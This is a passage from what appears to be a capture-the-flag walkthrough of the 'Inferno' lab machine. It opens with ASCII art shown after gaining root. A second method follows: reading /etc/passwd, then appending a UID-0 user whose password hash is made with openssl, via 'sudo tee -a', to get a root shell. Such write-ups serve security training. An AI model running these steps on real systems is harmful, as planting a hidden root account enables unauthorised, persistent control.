........^.^.^..^^..^^^^^!^!^^^^.^^^!^^!6|!||!II66I6666O66O6OOO6OQMMMQQMMMMMMMMOQOOO6O6O6OOOOOOQOQOQOOQQQOMI^^.
.. ^..^.^..^^.^..^..^^^^.^^.!^^^^^!^^^|!!!!!!I|II6II66QQOOQOOOQMMQMMMQMMMMMMMMOOQQOOOQMM6OOOOOOOQOOOQOQQQQM^.^
^...^.^.^..^^.^^.^.^..^^^^^^^^^!^^!|^|6OOOQOO66II6I666OMMMMMMMMMMMMMMMMMMMMMMMQQOQQOMMMOOOOOOOOOQQOOOOOQQQQM!^
.....^^..^.^..^^..^.^.^.!!^^!!^!^^!!IQOO6I|||IIO66666666QMMMMMMMMMMMMMMMMMMMMMQQOQOMMMMQOQOOOOQOOOQOOOQOQQQMO^
.^^.^..^^^^.^^..^^..^.^.^!^^^!^^^^^!|O66O6II|!II666O66I666MMMMMMMMMMMMMMMMMMMQQQQQMMMMMQOQOOOQOOOQOQOOOOQQMQQ!
^.^.^.^..^^^.^.^^.^^^.^^^^^^^^^^^^^!IIOO6I|!6II|66OO6666I6MQMMMMMMMMMMQMMMMMMMOOQQMMMMMMOQOQQQOOQOQOQOOQOQQQM|
.^..^.^..^..^^.^...^.^^.^^^.^.^^!^.I!IOO^|I6OQ66I66OO66IIIQQQOMMMMMMMMMMMMMMMMMQQQMMMMMMQQQOQOQQQOQQQOQOQQQQQM
^.^.^..^..^..^..^^^^.^^^^^^.^.^^^^6|IO666QOO6O6O6II66II6I6QQQMQOOMMMMMMMMMMMMMMMQMMMMMMMMQQQQOQMQOQQQQQOQQQQQQ
........^.^...^...^..^^^.^.^..^^I|I66II|!O|O666OI||I6I66I66QMQQMOOOOQOOQQQMMMMMMMQMMMMMMMMQMQMMMQQQQMQQOQQQQQQ
^.^.^^.....^.....^..^^^^^..^..^|!I66III||O6I|III!||I666666IQQMMMQ6OOOOOOQQOQMMMQMQMMMMMMMMQQMMMMMQQMQMMQQQQQQQ
..^.^.^...^......!...^.^.^^.^^^|6I66III!|I||||!!|II6O66O6666QMMMQ|OOOOQOOQQOQQQQMMMMMMMMMMQQMMMMMMQMQMQQQQQQQM
..^.^..^.^..^...^...^.^.^^..^^|III66I||||III||!||6I66O6OO6666MQQ|^||OMMMMMMMMMMQMMMMMMMMMMQMMQMMMMMMMQMQQQOQQQ
^.^.^^.^.^...^^^.^^.^.^^^.^^!|I6O6I6I6|III6I|IIII6666OOOO666O6OQ.^QMMMMMMMMMMMMMMMMMMMMMMMQMMMMMMMMQQQQQQOQQQM
.... ^....^...^^..^.^^^^.^^.^|I66I|66O6I6IIIIIII6OO66666O66666I!^QMMMMMMMMMMMMMMMMMMMMMMMMQMMMMMMMMMQQQQQQQQQM
....^. ^..^.^..^.....^^...^^6|II6OQQQ6I|I66I66III6OI666IO66666O.IMMMQQOMMMMMMMMMMMMMMMMMMQQMMMMMMMMMQQMQOQQOQQ
.^.....^.^..^......^^... ^.^^66O66OOO|!!II6II6666666II6II66666 .QI^^^^.!||QMMQMMQMQQQQMMMMQMMMMMMMMQOMMQQQQQQQ
^^..........^...^...  . .^..!^^^!^!III|!!66I|II6I6IIII|I6I6O6^.^^^.^...^^|!I6OOQOQQQOQQQQMMMMMMMMMMMQQQMQOQQQQ
...........^....^.......^..^^.^^^^O!||II||6II|III6IIIII6I66I|.^. ^... ....^^|I6QQOQOQQMMMMMMMMMMMMMQQMQQOQOQQQ
 ......^...^...^.... ^^..!^.^.^!^^^6OIII|||IIII|6IIIIIII66IO ^^. ... .....^^|III6QMMQMMMMMMMMMMMMQQQQMMQQQQQQQ
.^...... ...^^......^.^.^^^.^^^^^!66O66QOI|III6I|6I6III666O..^.^.... . ..^^^!IQMQMMMMMMMMMMMMMMMMQQQQQMQQQQQQM
.........^ ^.........^....^^^^^.^!!6II666|I66III6I66II6II66.^..^^^...^..^^|QQMMMMMMMMMMMMMMMMMMMMOOQQQMQOQQQQQ
 ... .....^ ...... . ^...^^^^^^^!^^6III||||I666O6IIII66666.!.^.^.....^.^O6OOOMQMMMMMMMMMMMMMMMMMMQOOQQQQQOQQQQ
.^..^..^^ .... . .. ... ^...^.^^.!|||||!|||I66I6IIII6I66O6.^^!.^O666I66O666O66OMMMMQMMMMMMMMMMMMQQQOQMQQQQOQQM
...^.......^... ... . ....^.^.^^^6||||II!|I6I66I66666O6O66!^IO666O6OO66O66666O6OO6OQQQMMMMMMMMMMQQOQQQQQQQMQQM
 .^........... ..... .....^ ...^.II6III6I666666OO666O6666I |6OO6666I666O6I666I6666O6OOQQMQQQMMMMQOOQQMQQQQQQMO
.^^......... ^....^... .. ...^.^^^!666666O66666OQOOQOOQOOO^6O6666666666OO666O6666666OOOMQOQ6OOMMQOQOQQQQQQOQM!
.^....^.. . ............. .^.^^...^^^^^^.^^.^^.^.^.^OOO6O6^I6I66I66666O66666I66O66OOO66O6O6OOOOMMOQQQQQQQQQQO!
..^..... ..^..........^.. .......^^.^.^.^.^..^.^^.^^!O6I6I.|66I6I666I6666I66666666IOOO6OOOOOOOOOMQQOQQQQQQQM!^
^....^...  .^..  . ...........^....^.^^.^^^..^.^..^^^OI|6| |III6I6I6IO66666666I6O6O6OOOOOOOOOOOOOQOQQQQQQQM!^!
....... . ...........^.....^ ... ..^^^^^^.^..^..^^.^^6|||| |I|II6I66I6I6I!I6O6OOO6OOOOOOOO6O6OO6OOQQQMQQQQO!^^
... ...... .. ..... ..^ ......^..^^^..^^..^^^....^^^|II!|| |III6I666|^|6O6OOOOOOQOOOOOOO6OOOO6O6O66QQQQMOQ^^^!
...  ...... ... .^^..^.....^.....^....^.^..^^.....^|6I.III.6|^||!I6I66OOO6OOO6OOO66OO6OOOOOOOOO66OOOOQQMQ!^^!^
....... .  ......^...^..^....^.^^^..^.....^^.^...^^!O66OO6 66O66OOOOO6OOOOO6OOO6O6O6OOOOO666OO6OOOQOOOQQ!^^^^!
^... .^.. .. .^..^... .....^.^^...^.^.^^^^..^..^^^!IO66666.OO6O6O66OO6OOOOOOOOOOOOOOO6O6OO666O6O6OOO6OOO^^^!!^
..^........... ...^.^^..^.^..^..^...^^...^.^.^..^I6O6I666||66OO6O6O6O6O6O6O6OOO6O6O666O666O6OO6O66O6OO6OOO6^!^
.^  ... ... ......^...^ ...^..^^.^^^^....^^...^I66I6O6666.66OOO66OO66O6OO6O6O66IO6666O66I6O6O6OO6O6OO6OOOO6OQ^
....^......^ ..^.^......^^.^..^.^...^....^.^.II6I6I66I6O6|O66O6O666I6II66O6II66I66666O6666666OOOO6O6OO6OOOOOOO
........ ..........^.^..............^...^^^IIIIIII6I6I6I.IIII6I6II6I6I66O6I66I66II6666666OO6OO6O66O66O6OOOOOQO
. . ... .. .^^.....^....^........^^^...^^!IIIIII6IIIII6.|III66III6I666I66I66O66I6I666666OO666666666OO6O6OO6OOQ
 .... .^.. . ^..^...^...^......^.!....^^II6I6I66I6II6I|I6II6III66I6I6II6I666I666666O6O66II66I6I6O66O6O6O6OOOOO
... . .... ..^......^..^...^^.^.^.^..^IIIIII66II6III6!III6666I666III666II666666666666II6III66I6I666OO6O6OOOOOO
.. . ..... . ......^^.. .^...^.^....II6IIIII66IIIIII!I66I6I66II66I66666II666666666I|IIIII6O6I666I6OO6OOOOOOO6O
...... ..... . .... ^..^.^..^^^...^I6IIIII66IIII6IIII66IIIIII66I6O66I66666666O6O6III6I6I6I66I6666O66O6OOOOOOOO
 . ....^.... . ............^...^^I6IIII66I66IIIII66III6III66I66666I6I6666666O66IIIII6I6I666666666666O6OOO6OOOO
 .  .......^^.....^. ......^^.^|II6IIII6I66IIIIIII6I6I6I6I6I666I66II66II666O66I6IIIII66I66II66O6O666O6OOOO6OOQ
  .. ......^^.. .^.....^.....^IIIIII6III66IIIIII6I6II6II66II66II66I6666666OOI6II6III|I66I6666I66OOI6O6OOOOOOOO
 . ....  ....^......^. .^.^.!|II6I|IIIIIIIII6III6III6I66I6I6I6II6I666I666O66IIIIIII6II6I6666I6666O666O6OOOOQOO
.  ... . .^..^..... ...^.^^|IIIIIII|II6IIIIIII6II66III6I666I666II66666O6OOIIIIIIIIIII6I66666I6666O6OO66OOOOO6O
..  ..... ^ ..... ^..^...^|I6IIIIIIII6IIIII6III6II6I6I6I666I6III66I6666OO6IIIIIIIIIII6I6O6I6I666O66O66O6OO6OOO
. ......  .. ..^.....^.^^IIIII|IIII6IIIII6II6II6I6II66I666I6II6666666O6O6I6IIIIIII6II6I6I6I666666O66O66OOOOOOO
..  ....   . ..^ .. .^.!III|I|IIII6IIIII6III66I6II6I66666O66I6666O666OQ66I6II6I|II6III6666I6666I666O6O6OOOOOOO
.  . .....  . .. ..^..II|I6|II|IIOIIIII6IIIIIIII6II6I666666I6I666O666O6I6IIIIIIII66III66I6666666O666O6O666OOOO
 ... .  .... .... ...II|!|IIII|I66IIII6IIIIIIIIIII6I6666O66II6666OO6OO666I6IIIII6II6I666IO66666666OO66OOOOOOQO
... ....^ ..^...^^.!6I|I|IIII|I6II6IIIIIII66II6III6II66666I666O6O66O66II6I6IIIIIIII66I66666666IO66666OO6OOOOOQ
    ......^.....^^^6IIII|6IIIIIIIIII6IIII6III6III66I66O666|66O6O6OOO66666IIIIIII6I666666IO66O666666O666OOOOOOO
. . .. . .....^.^^66II|IIIIIIIII6IIII6II6III6IIII66I6666I66666O6OOOOI66II6I6IIII666I6666666I666O666O66OOOOQOOQ
. .. ......^.^^^^II6II|IIII6IIIIIIIIII66I6IIIIII66I66O66I666OOO66OO66I66I66II6I666666O666666O6666O6O6OOOOOOOOO
  . ....^ .....^I6II|I6IIIIIIIIIIII6I6666III6I6I666O6O6666OO66OO6O6I6I6II6I6I6666I66O666O666O66O6O6O6O6OO6OQOQ
. ...^...^...^^II6IIIIIIIIIIIIII6I66I666III6I666666O6666666O6O66OO6O66I6I6III6II666666O666IO6OO6O6OO66O6OOOOOO
. . .. ...^.^^|I6III6IIIIIIIIII6666II666I6I6I66I666O66666OO6O666OOO66666II6I66I66666666O6666O66O6O666O6OOOOOOO
 ..^..^.....^II6IIIIII66IIIIIIII666I6III6II666666OO66666666O6OO6OO6666O6666II66666I66O66666O6O66O66OO6OOOOOOQQ
.... ..^..^.|I6II6IIIIII66IIII6I6II66I6II6I666666O666666O6OOO6OOOO66O666II6I666I66OO66O66666O6O666OO6OOOOOOQQO
..^..^.^.^.^I6I6III6II6IIII6I666I6666III6IO66666O66O6666666O6OOO6OO6O66I6I66I6666I6O6O6O66O6O6666OO6OO6OO6OOOQ
....^..^^.^6II6III6IIIIIII66666I6O66II6II6666O66OOO6I6O6O66OO6OO6O6O6666I6666I66666I666OO6O6OO6O66OO6OOOOOQOQQ
 ....^^^^^66I66II66IIIIII6O666I6666I6III6666O6O66O666IO6OO6O6O6OOO6O666666O6666666IO6666O66O66O6O666O6OOOOOOOO
^.^.^!^!^!6I666I6|IIIIII66666I66O6I6I6II66O66OOO6O6666666O6OOO6OOO6OII66O6666666O6OO666O66OO66O66666OOO6OOOOOO
...^.^^^.666I6IIIIIIII6I66I666O66III6III66666O66O6666666O6OO6O66OOO6OI666666666O66O6OO6666O6666O6OO6O66OOOOQOO
. .^..^.666I66IIIIIIIII|I66II666I6III6I6666I66O6O666666666O6O66OOO6I66I6OII66O66O6O6O6O66O6I6666O6O6O6OO6OOQQO
......^^I666IIIIIIIIIIIII6III66666III6I6I6O6OO6666666666666O6OO6666II6666I66666O666O66O6
root@Inferno:~# 

Now, we have successfully gained the root flag.


Method 2. Adding a New User with Root Privileges

Let's explore the second method, which involves adding a new user to the target system: 

To do this, we'll use the openssl command line tool to generate an encrypted password for the new user.

1. First, we'll display the contents of the " /etc/passwd " file by typing " cat " followed by the file path. 

dante@Inferno:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
dante:x:1000:1000:dante,,,:/home/dante:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
dante@Inferno:~$

2. Next, we'll have to copy the structure of the "root" user and paste it into a text editor. Instead of "x" replace it with a dollar sign. Inside the brackets, we'll use the " openssl passwd -6 -salt <user_name> <password> "

technoscience:$(openssl passwd -6 -salt technoscience password123):0:0:technoscience:/root:/bin/bash"

Where, 

  1. The "-6" flag indicates an SHA-512 hash
  2. The "-salt" flag adds salt to the hash for security
  3. Instead of " root ," we'll use the new username for the user that we want to create. 

After that, we'll add the " tee " command to save the changes to the " /etc/passwd " file:

echo " technoscience:$(openssl passwd -6 -salt technoscience password123):0:0:technoscience:/root:/bin/bash " | sudo tee -a "/etc/passwd"

Finally, we'll copy the newly generated command, and paste the entire command into the terminal to add the new user.

dante@Inferno:~$ echo "technoscience:$(openssl passwd -6 -salt technoscience password123):0:0:technoscience:/root:/bin/bash" | sudo tee -a "/etc/passwd"
technoscience:$6$technoscience$HzTWWWguPL9gyLn4ipfSLtsDt2YX1lYs67r3aJG04rvoVa31N9.FWB37gyEbTn1jGQkzTZ4C/kJLc5D0awgs1/:0:0:technoscience:/root:/bin/bash       
dante@Inferno:~$

Now, we can switch to the newly created user by running the " su " command:

dante@Inferno:~$ su technoscience
Password:                    
root@Inferno:/home/dante#

As you can see we have successfully gained root privilege.

If you have any questions or doubts, feel free to leave a comment in the comment section below. I'll be happy to help and address any inquiries you may have.

Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!